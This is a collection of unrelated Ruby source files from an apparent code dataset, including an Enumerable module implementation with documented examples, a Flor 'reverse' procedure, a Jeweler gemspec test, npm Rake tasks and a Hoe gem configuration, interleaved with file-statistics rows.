s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'YM' => '[email protected]' }
s.source = { :git => 'https://github.com/ModuleProject/YMNetworking.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '8.0'
s.source_files = 'YMNetworking/Classes/**/*'
# s.resource_bundles = {
# 'YMNetworking' => ['YMNetworking/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
# s.dependency 'AFNetworking', '~> 2.3'
end
| 36.906977 | 110 | 0.637681 |
08136a6559096d1c84f7506bf9d0130053d5e845 | 72 | module ModulePos
module Fiscalization
VERSION = "0.1.0"
end
end
| 12 | 22 | 0.694444 |
0166e00f176cf0310ad930f4ae7c055bf0f156a3 | 913 | # frozen_string_literal: true
class Flor::Pro::Reverse < Flor::Procedure
#
# Reverses an array or a string.
#
# ```
# reverse [ 0, 2, 4 ]
# # --> sets f.ret to [ 4, 2, 0 ]
# reverse "melimelo"
# # --> sets f.ret to "olemilem"
# ```
#
# Reverses f.ret if there are no arguments
# ```
# [ 5, 6, 4 ] # sets f.ret to [ 5, 6, 4 ]
# reverse _ # sets f.ret to [ 4, 6, 5 ]
# ```
#
# Will fail if it finds nothing reversable.
#
# # see also
#
# shuffle, sort, and sort_by
name 'reverse'
def pre_execute
@node['ret'] = receive_payload_ret
unatt_unkeyed_children
end
def receive_payload_ret
r = payload['ret']
r.respond_to?(:reverse) ? r.reverse : false
end
def receive_last
r =
@node['ret'] ||
fail(
Flor::FlorError.new('found no argument that could be reversed', self))
wrap_reply('ret' => r)
end
end
| 17.557692 | 78 | 0.561884 |
f89aa708b78381824efb3aed6b3e454eca6a71a1 | 20,343 | # depends on: module.rb class.rb
##
# The Enumerable mixin provides collection classes with several traversal
# and searching methods, and with the ability to sort. The class must provide
# a method #each, which yields successive members of the collection. If
# Enumerable#max, #min, or #sort is used, the objects in the collection must
# also implement a meaningful <tt><=></tt> operator, as these methods rely on
# an ordering between members of the collection.
#--
# Just to save you 10 seconds, the reason we always use #each to extract
# elements instead of something simpler is because Enumerable can not assume
# any other methods than #each. If needed, class-specific versions of any of
# these methods can be written *in those classes* to override these.
module Enumerable
class Sort
def initialize(sorter = nil)
@sorter = sorter
end
def sort(xs, &prc)
# The ary should be inmutable while sorting
prc = Proc.new { |a,b| a <=> b } unless block_given?
if @sorter
@sorter = method(@sorter) unless @sorter.respond_to?(:call)
@sorter.call(xs, &prc)
else
quicksort(xs, &prc)
end
end
alias_method :call, :sort
class SortedElement
def initialize(val, sort_id)
@value, @sort_id = val, sort_id
end
attr_reader :value
attr_reader :sort_id
def <=>(other)
@sort_id <=> other.sort_id
end
end
def sort_by(xs)
# The ary and its elements sould be inmutable while sorting
elements = xs.map { |x| SortedElement.new(x, yield(x)) }
sort(elements).map { |e| e.value }
end
##
# Sort an Enumerable using simple quicksort (not optimized)
def quicksort(xs, &prc)
return [] unless xs
pivot = Undefined
xs.each { |o| pivot = o; break }
return xs if pivot.equal? Undefined
lmr = xs.group_by do |o|
if o.equal?(pivot)
0
else
yield(o, pivot)
end
end
quicksort(lmr[-1], &prc) + lmr[0] + quicksort(lmr[1], &prc)
end
end
##
# :call-seq:
# enum.to_a => array
# enum.entries => array
#
# Returns an array containing the items in +enum+.
#
# (1..7).to_a #=> [1, 2, 3, 4, 5, 6, 7]
# { 'a'=>1, 'b'=>2, 'c'=>3 }.to_a #=> [["a", 1], ["b", 2], ["c", 3]]
def to_a
collect { |e| e }
end
alias_method :entries, :to_a
##
# :call-seq:
# enum.grep(pattern) => array
# enum.grep(pattern) { | obj | block } => array
#
# Returns an array of every element in +enum+ for which <tt>Pattern ===
# element</tt>. If the optional +block+ is supplied, each matching element
# is passed to it, and the block's result is stored in the output array.
#
# (1..100).grep 38..44 #=> [38, 39, 40, 41, 42, 43, 44]
# c = IO.constants
# c.grep(/SEEK/) #=> ["SEEK_END", "SEEK_SET", "SEEK_CUR"]
# res = c.grep(/SEEK/) { |v| IO.const_get(v) }
# res #=> [2, 0, 1]
def grep(pattern)
ary = []
each do |o|
if pattern === o
ary << (block_given? ? yield(o) : o)
end
end
ary
end
def sorter
Enumerable::Sort.new
end
##
# :call-seq:
# enum.sort => array
# enum.sort { | a, b | block } => array
#
# Returns an array containing the items in +enum+ sorted, either according
# to their own <tt><=></tt> method, or by using the results of the supplied
# block. The block should return -1, 0, or +1 depending on the comparison
# between +a+> and +b+. As of Ruby 1.8, the method Enumerable#sort_by
# implements a built-in Schwartzian Transform, useful when key computation
# or comparison is expensive..
#
# %w(rhea kea flea).sort #=> ["flea", "kea", "rhea"]
# (1..10).sort { |a,b| b <=> a} #=> [10, 9, 8, 7, 6, 5, 4, 3, 2, 1]
def sort(&prc)
sorter.sort(self, &prc)
end
##
# :call-seq:
# enum.sort_by { | obj | block } => array
#
# Sorts +enum+ using a set of keys generated by mapping the
# values in +enum+ through the given block.
#
# %w{ apple pear fig }.sort_by { |word| word.length}
# #=> ["fig", "pear", "apple"]
#
# The current implementation of sort_by generates an array of tuples
# containing the original collection element and the mapped value. This makes
# sort_by fairly expensive when the keysets are simple
#
# require 'benchmark'
# include Benchmark
#
# a = (1..100000).map {rand(100000)}
#
# bm(10) do |b|
# b.report("Sort") { a.sort }
# b.report("Sort by") { a.sort_by { |a| a} }
# end
#
# produces:
#
# user system total real
# Sort 0.180000 0.000000 0.180000 ( 0.175469)
# Sort by 1.980000 0.040000 2.020000 ( 2.013586)
#
# However, consider the case where comparing the keys is a non-trivial
# operation. The following code sorts some files on modification time
# using the basic sort method.
#
# files = Dir["#"]
# sorted = files.sort { |a,b| File.new(a).mtime <=> File.new(b).mtime}
# sorted #=> ["mon", "tues", "wed", "thurs"]
#
# This sort is inefficient: it generates two new File objects during every
# comparison. A slightly better technique is to use the Kernel#test method
# to generate the modification times directly.
#
# files = Dir["#"]
# sorted = files.sort { |a,b|
# test(?M, a) <=> test(?M, b)
# }
# sorted #=> ["mon", "tues", "wed", "thurs"]
#
# This still generates many unnecessary Time objects. A more efficient
# technique is to cache the sort keys (modification times in this case)
# before the sort. Perl users often call this approach a Schwartzian
# Transform, after Randal Schwartz. We construct a temporary array, where
# each element is an array containing our sort key along with the filename.
# We sort this array, and then extract the filename from the result.
#
# sorted = Dir["#"].collect { |f|
# [test(?M, f), f]
# }.sort.collect { |f| f[1] }
# sorted #=> ["mon", "tues", "wed", "thurs"]
#
# This is exactly what sort_by does internally.
#
# sorted = Dir["#"].sort_by { |f| test(?M, f)}
# sorted #=> ["mon", "tues", "wed", "thurs"]
def sort_by(&prc)
sorter.sort_by(self, &prc)
end
##
# :call-seq:
# enum.count(item) => int
# enum.count { | obj | block } => int
#
# Returns the number of items in +enum+ for which equals to +item+. If a
# block is given, counts the number of elements yielding a true value.
#
# ary = [1, 2, 4, 2]
# ary.count(2) # => 2
# ary.count{ |x|x%2==0} # => 3
def count(item = Undefined)
seq = 0
unless item.equal? Undefined
each { |o| seq += 1 if item == o }
else
each { |o| seq += 1 if yield(o) }
end
seq
end
##
# :call-seq:
# enum.detect(ifnone = nil) { | obj | block } => obj or nil
# enum.find(ifnone = nil) { | obj | block } => obj or nil
#
# Passes each entry in +enum+ to +block+>. Returns the first for which
# +block+ is not false. If no object matches, calls +ifnone+ and returns
# its result when it is specified, or returns nil
#
# (1..10).detect { |i| i % 5 == 0 and i % 7 == 0 } #=> nil
# (1..100).detect { |i| i % 5 == 0 and i % 7 == 0 } #=> 35
def find(ifnone = nil)
each { |o| return o if yield(o) }
ifnone.call if ifnone
end
alias_method :detect, :find
##
# :call-seq:
# enum.find_index(ifnone = nil) { | obj | block } => int
#
# Passes each entry in +enum+ to +block+. Returns the index for the first
# for which +block+ is not false. If no object matches, returns
# nil.
#
# (1..10).find_index { |i| i % 5 == 0 and i % 7 == 0 } #=> nil
# (1..100).find_index { |i| i % 5 == 0 and i % 7 == 0 } #=> 35
def find_index(ifnone = nil)
idx = -1
each { |o| idx += 1; return idx if yield(o) }
ifnone.call if ifnone
end
##
# :call-seq:
# enum.find_all { | obj | block } => array
# enum.select { | obj | block } => array
#
# Returns an array containing all elements of +enum+ for which +block+ is
# not false (see also Enumerable#reject).
#
# (1..10).find_all { |i| i % 3 == 0 } #=> [3, 6, 9]
def find_all
ary = []
each do |o|
if yield(o)
ary << o
end
end
ary
end
alias_method :select, :find_all
##
# :call-seq:
# enum.reject { | obj | block } => array
#
# Returns an array for all elements of +enum+ for which +block+ is false
# (see also Enumerable#find_all).
#
# (1..10).reject { |i| i % 3 == 0 } #=> [1, 2, 4, 5, 7, 8, 10]
def reject
ary = []
each do |o|
unless yield(o)
ary << o
end
end
ary
end
##
# :call-seq:
# enum.collect { | obj | block } => array
# enum.map { | obj | block } => array
#
# Returns a new array with the results of running +block+ once for every
# element in +enum+.
#
# (1..4).collect { |i| i*i } #=> [1, 4, 9, 16]
# (1..4).collect { "cat" } #=> ["cat", "cat", "cat", "cat"]
def collect
ary = []
if block_given?
each { |o| ary << yield(o) }
else
each { |o| ary << o }
end
ary
end
alias_method :map, :collect
##
# :call-seq:
# enum.inject(initial) { | memo, obj | block } => obj
# enum.inject { | memo, obj | block } => obj
#
# Combines the elements of +enum+ by applying the block to an accumulator
# value (+memo+) and each element in turn. At each step, +memo+ is set
# to the value returned by the block. The first form lets you supply an
# initial value for +memo+. The second form uses the first element of the
# collection as a the initial value (and skips that element while
# iterating).
#
# Sum some numbers:
#
# (5..10).inject { |sum, n| sum + n } #=> 45
#
# Multiply some numbers:
#
# (5..10).inject(1) { |product, n| product * n } #=> 151200
#
# Find the longest word:
#
# longest = %w[ cat sheep bear ].inject do |memo,word|
# memo.length > word.length ? memo : word
# end
#
# longest #=> "sheep"
#
# Find the length of the longest word:
#
# longest = %w[ cat sheep bear ].inject(0) do |memo,word|
# memo >= word.length ? memo : word.length
# end
#
# longest #=> 5
def inject(memo = Undefined)
each { |o|
if memo.equal? Undefined
memo = o
else
memo = yield(memo, o)
end
}
memo.equal?(Undefined) ? nil : memo
end
##
# :call-seq:
# enum.partition { | obj | block } => [ true_array, false_array ]
#
# Returns two arrays, the first containing the elements of +enum+ for which
# the block evaluates to true, the second containing the rest.
#
# (1..6).partition { |i| (i&1).zero?} #=> [[2, 4, 6], [1, 3, 5]]
def partition
left = []
right = []
each { |o| yield(o) ? left.push(o) : right.push(o) }
return [left, right]
end
##
# :call-seq:
# enum.group_by { | obj | block } => a_hash
#
# Returns a hash, which keys are evaluated result from the block, and values
# are arrays of elements in +enum+ corresponding to the key.
#
# (1..6).group_by { |i| i%3} #=> {0=>[3, 6], 1=>[1, 4], 2=>[2, 5]}
def group_by
h = {}
i = 0
each do |o|
key = yield(o)
if h.key?(key)
h[key] << o
else
h[key] = [o]
end
end
h
end
##
# :call-seq:
# enum.first => obj or nil
# enum.first(n) => an_array
#
# Returns the first element, or the first +n+ elements, of the enumerable.
# If the enumerable is empty, the first form returns nil, and the second
# form returns an empty array.
def first(n = nil)
if n && n < 0
raise ArgumentError, "Invalid number of elements given."
end
ary = []
each do |o|
return o unless n
return ary if ary.size == n
ary << o
end
n ? ary : nil
end
# :call-seq:
# enum.all? => true or false
# enum.all? { |obj| block } => true or false
#
# Passes each element of the collection to the given block. The method
# returns true if the block never returns false or nil. If the block is not
# given, Ruby adds an implicit block of <tt>{ |obj| obj }</tt> (that is all?
# will return true only if none of the collection members are
# false or nil.)
#
# %w[ant bear cat].all? { |word| word.length >= 3} #=> true
# %w[ant bear cat].all? { |word| word.length >= 4} #=> false
# [ nil, true, 99 ].all? #=> false
def all?
if block_given?
each { |e| return false unless yield(e) }
else
each { |e| return false unless e }
end
true
end
##
# :call-seq:
# enum.any? [{ |obj| block } ] => true or false
#
# Passes each element of the collection to the given block. The method
# returns true if the block ever returns a value other than false or nil. If
# the block is not given, Ruby adds an implicit block of <tt>{ |obj| obj
# }</tt> (that is any? will return true if at least one of the collection
# members is not false or nil.
#
# %w[ant bear cat].any? { |word| word.length >= 3} #=> true
# %w[ant bear cat].any? { |word| word.length >= 4} #=> true
# [ nil, true, 99 ].any? #=> true
def any?(&prc)
prc = Proc.new { |obj| obj } unless block_given?
each { |o| return true if prc.call(o) }
false
end
##
# :call-seq:
# enum.one? => true or false
# enum.one? { |obj| block } => true or false
#
# Passes each element of the collection to the given block. The method
# returns true if the block returns true exactly once. If the block is not
# given, one? will return true only if exactly one of the collection members
# are true.
#
# %w[ant bear cat].one? { |word| word.length == 4} #=> true
# %w[ant bear cat].one? { |word| word.length >= 4} #=> false
# [ nil, true, 99 ].one? #=> true
def one?(&prc)
prc = Proc.new { |obj| obj } unless block_given?
times = 0
each { |o| times += 1 if prc.call(o) }
times == 1
end
##
# :call-seq:
# enum.none? => true or false
# enum.none? { |obj| block } => true or false
#
# Passes each element of the collection to the given block. The method
# returns true if the block never returns true for all elements. If the
# block is not given, none? will return true only if any of the collection
# members is true.
#
# %w{ant bear cat}.none? { |word| word.length == 4} #=> true
# %w{ant bear cat}.none? { |word| word.length >= 4} #=> false
# [ nil, true, 99 ].none? #=> true
def none?(&prc)
prc = Proc.new { |obj| obj } unless block_given?
times = 0
each { |o| times += 1 if prc.call(o) }
times == 0
end
##
# :call-seq:
# enum.min => obj
# enum.min { | a,b | block } => obj
#
# Returns the object in +enum+ with the minimum value. The first form
# assumes all objects implement Comparable; the second uses the block to
# return <tt>a <=> b</tt>.
#
# a = %w[albatross dog horse]
# a.min #=> "albatross"
# a.min { |a,b| a.length <=> b.length } #=> "dog"
def min(&prc)
prc = Proc.new { |a, b| a <=> b } unless block_given?
min = Undefined
each do |o|
if min.equal? Undefined
min = o
else
comp = prc.call(o, min)
if comp.nil?
raise ArgumentError, "comparison of #{o.class} with #{min} failed"
elsif comp < 0
min = o
end
end
end
min.equal?(Undefined) ? nil : min
end
##
# :call-seq:
# enum.max => obj
# enum.max { |a,b| block } => obj
#
# Returns the object in +enum+ with the maximum value. The first form
# assumes all objects implement Comparable; the second uses the block to
# return <tt>a <=> b</tt>.
#
# a = %w[albatross dog horse]
# a.max #=> "horse"
# a.max { |a,b| a.length <=> b.length } #=> "albatross"
def max(&prc)
prc = Proc.new { |a, b| a <=> b } unless block_given?
max = Undefined
each do |o|
if max.equal? Undefined
max = o
else
comp = prc.call(o, max)
if comp.nil?
raise ArgumentError, "comparison of #{o.class} with #{max} failed"
elsif comp > 0
max = o
end
end
end
max.equal?(Undefined) ? nil : max
end
##
# :call-seq:
# enum.min_by { |obj| block } => obj
#
# Uses the values returned by the given block as a substitute for the real
# object to determine what is considered the smallest object in +enum+ using
# <tt>lhs <=> rhs</tt>. In the event of a tie, the object that appears first
# in #each is chosen. Returns the "smallest" object or nil if the enum is
# empty.
#
# a = %w[albatross dog horse]
# a.min_by { |x| x.length } #=> "dog"
def min_by()
min_obj, min_value = Undefined, Undefined
each do |o|
value = yield(o)
if min_obj.equal?(Undefined) or (min_value <=> value) > 0
min_obj, min_value = o, value
end
end
min_obj.equal?(Undefined) ? nil : min_obj
end
##
# :call-seq:
# enum.max_by { | obj| block } => obj
#
# Uses the values returned by the given block as a substitute for the real
# object to determine what is considered the largest object in +enum+ using
# <tt>lhs <=> rhs</tt>. In the event of a tie, the object that appears first
# in #each is chosen. Returns the "largest" object or nil if the enum is
# empty.
#
# a = %w[albatross dog horse]
# a.max_by { |x| x.length } #=> "albatross"
def max_by()
max_obj, max_value = Undefined, Undefined
each do |o|
value = yield(o)
if max_obj.equal?(Undefined) or (max_value <=> value) < 0
max_obj, max_value = o, value
end
end
max_obj.equal?(Undefined) ? nil : max_obj
end
# :call-seq:
# enum.include?(obj) => true or false
# enum.member?(obj) => true or false
#
# Returns true if any member of +enum+ equals +obj+. Equality is tested
# using #==.
#
# IO.constants.include? "SEEK_SET" #=> true
# IO.constants.include? "SEEK_NO_FURTHER" #=> false
def include?(obj)
each { |o| return true if obj == o }
false
end
alias_method :member?, :include?
##
# :call-seq:
# enum.each_with_index { |obj, i| block } -> enum
#
# Calls +block+ with two arguments, the item and its index, for
# each item in +enum+.
#
# hash = {}
# %w[cat dog wombat].each_with_index { |item, index|
# hash[item] = index
# }
#
# p hash #=> {"cat"=>0, "wombat"=>2, "dog"=>1}
def each_with_index
idx = 0
each { |o| yield(o, idx); idx += 1 }
self
end
##
# :call-seq:
# enum.zip(arg, ...) => array
# enum.zip(arg, ...) { |arr| block } => nil
#
# Converts any arguments to arrays, then merges elements of +enum+ with
# corresponding elements from each argument. This generates a sequence of
# enum#size +n+-element arrays, where +n+ is one more that the count of
# arguments. If the size of any argument is less than enum#size, nil values
# are supplied. If a block given, it is invoked for each output array,
# otherwise an array of arrays is returned.
#
# a = [ 4, 5, 6 ]
# b = [ 7, 8, 9 ]
#
# (1..3).zip(a, b) #=> [[1, 4, 7], [2, 5, 8], [3, 6, 9]]
# "cat\ndog".zip([1]) #=> [["cat\n", 1], ["dog", nil]]
# (1..3).zip #=> [[1], [2], [3]]
def zip(*args)
result = []
args = args.map { |a| a.to_a }
each_with_index do |o, i|
result << args.inject([o]) { |ary, a| ary << a[i] }
yield(result.last) if block_given?
end
result unless block_given?
end
end
| 28.332869 | 79 | 0.552967 |
038ed5f78e31787f4302c9b6b05d00ab5d5c2599 | 732 | require File.dirname(__FILE__) + '/test_helper'
class TestGemspec < Test::Unit::TestCase
context "A Jeweler::GemSpec, given a gemspec" do
setup do
@spec = build_spec
@helper = Jeweler::GemSpecHelper.new(@spec, File.dirname(__FILE__))
end
should 'have sane gemspec path' do
assert_equal "test/#{@spec.name}.gemspec", @helper.path
end
end
context "Jeweler::GemSpec#write" do
setup do
@spec = build_spec
@helper = Jeweler::GemSpecHelper.new(@spec)
FileUtils.rm_f(@helper.path)
@helper.write
end
should "create gemspec file" do
assert File.exists?(@helper.path)
end
should "make valid spec" do
assert @helper.valid?
end
end
end
| 22.181818 | 73 | 0.650273 |
b9a16618ff5f56ade398737b2143677b3d527fff | 279 | namespace :npm do
desc 'exec `npm install`'
task :install do
puts system('npm install')
end
desc 'exec `npm run build`'
task build: ['install'] do
puts system('npm run build')
end
end
Rake::Task['assets:precompile'].enhance(['npm:build']) do
# doing!
end
| 17.4375 | 57 | 0.648746 |
b9d234534c998ca74bb46e11fdb7e4b5dca224f7 | 2,537 | require 'fireeagle/version'
AUTHOR = 'Jesse Newland' # can also be an array of Authors
EMAIL = "[email protected]"
DESCRIPTION = "Ruby wrapper for Yahoo!'s FireEagle"
GEM_NAME = 'fireeagle' # what ppl will type to install your gem
RUBYFORGE_PROJECT = 'fireeagle' # The unix name for your project
HOMEPATH = "http://#{RUBYFORGE_PROJECT}.rubyforge.org"
DOWNLOAD_PATH = "http://rubyforge.org/projects/#{RUBYFORGE_PROJECT}"
@config_file = "~/.rubyforge/user-config.yml"
@config = nil
RUBYFORGE_USERNAME = "unknown"
def rubyforge_username
unless @config
begin
@config = YAML.load(File.read(File.expand_path(@config_file)))
rescue
puts <<-EOS
ERROR: No rubyforge config file found: #{@config_file}
Run 'rubyforge setup' to prepare your env for access to Rubyforge
- See http://newgem.rubyforge.org/rubyforge.html for more details
EOS
exit
end
end
RUBYFORGE_USERNAME.replace @config["username"]
end
REV = nil
# UNCOMMENT IF REQUIRED:
# REV = `svn info`.each {|line| if line =~ /^Revision:/ then k,v = line.split(': '); break v.chomp; else next; end} rescue nil
VERS = FireEagle::VERSION::STRING + (REV ? ".#{REV}" : "")
RDOC_OPTS = ['--quiet', '--title', 'fireeagle rdoc',
"--opname", "index.html",
"--line-numbers",
"--main", "README",
"--inline-source"]
class Hoe
def extra_deps
@extra_deps.reject! { |x| Array(x).first == 'hoe' }
@extra_deps
end
end
# Generate all the Rake tasks
# Run 'rake -T' to see list of generated tasks (from gem root directory)
hoe = Hoe.new(GEM_NAME, VERS) do |p|
p.developer(AUTHOR, EMAIL)
p.description = DESCRIPTION
p.summary = DESCRIPTION
p.url = HOMEPATH
p.rubyforge_name = RUBYFORGE_PROJECT if RUBYFORGE_PROJECT
p.test_globs = ["test/**/test_*.rb"]
p.clean_globs |= ['**/.*.sw?', '*.gem', '.config', '**/.DS_Store'] #An array of file patterns to delete on clean.
# == Optional
p.changes = p.paragraphs_of("History.txt", 0..1).join("\n\n")
p.extra_deps = [ ['oauth', '>= 0.2.1'], ['hpricot', '>= 0.6'], ['GeoRuby', '>= 1.3.2'] ] # An array of rubygem dependencies [name, version], e.g. [ ['active_support', '>= 1.3.1'] ]
#p.spec_extras = {} # A hash of extra values to set in the gemspec.
end
CHANGES = hoe.paragraphs_of('History.txt', 0..1).join("\\n\\n")
PATH = (RUBYFORGE_PROJECT == GEM_NAME) ? RUBYFORGE_PROJECT : "#{RUBYFORGE_PROJECT}/#{GEM_NAME}"
hoe.remote_rdoc_dir = File.join(PATH.gsub(/^#{RUBYFORGE_PROJECT}\/?/,''), 'rdoc')
hoe.rsync_args = '-av --delete --ignore-errors' | 36.242857 | 186 | 0.662594 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.